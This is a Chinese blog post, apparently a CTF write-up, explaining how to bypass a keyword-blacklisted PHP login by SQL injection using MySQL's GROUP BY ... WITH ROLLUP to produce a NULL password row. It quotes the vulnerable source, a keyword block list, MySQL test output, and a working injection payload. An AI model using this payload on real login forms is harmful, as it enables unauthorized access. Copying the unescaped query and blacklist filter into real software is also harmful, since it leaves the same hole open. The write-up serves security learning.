实验吧 因缺思汀的绕过 By Assassin(with rollup统计)

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_35078631/article/details/54772798

这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。

首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "浜﹀彲璧涜墖锛?";
    }
}else{
    print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>

可以看到主要是
$filter = “and|select|from|where|union|join|sleep|benchmark|,|(|)”;
这句话过滤了很多关键词,加上function AttackFilter这个函数起到了过滤的作用,这里是巧妙地用了select过程中​​用group by with rollup这个统计的方法进行插入查询。我们用mysql做几个小实验就明白这个是怎么用的了!

mysql> create table test (
    -> user varchar(100) not null,
    -> pwd varchar(100) not null);  
mysql>insert into test values("admin","mypass");
mysql>select * from test group by pwd with rollup
mysql> select * from test group by pwd with rollup;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
| admin | mypass     |
| admin | NULL       |
+-------+------------+
3 rows in set

mysql> select * from test group by pwd with rollup limit 1
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
mysql> select * from test group by pwd with rollup limit 1 offset 0
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 1
;
+-------+--------+
| user  | pwd    |
+-------+--------+
| admin | mypass |
+-------+--------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 2
;
+-------+------+
| user  | pwd  |
+-------+------+
| admin | NULL |
+-------+------+
1 row in set 

哎,然后我们就看到关键了,这个查询的时候可以想办法
让pwd变成空,而且user这一列用的却是也是存在的字段!
这就很好用了!又有if (mysql_num_rows($query) == 1)知道只要一列

然后我们构造payload
’ or 1=1 group by pwd with rollup limit 1 offset XX#
然后一个试出来就行啦。涨姿势!
这是第二届北京网络安全技术大赛夺旗赛Writeup(Web安全篇)​的一个题目

阅读更多

没有更多推荐了,返回首页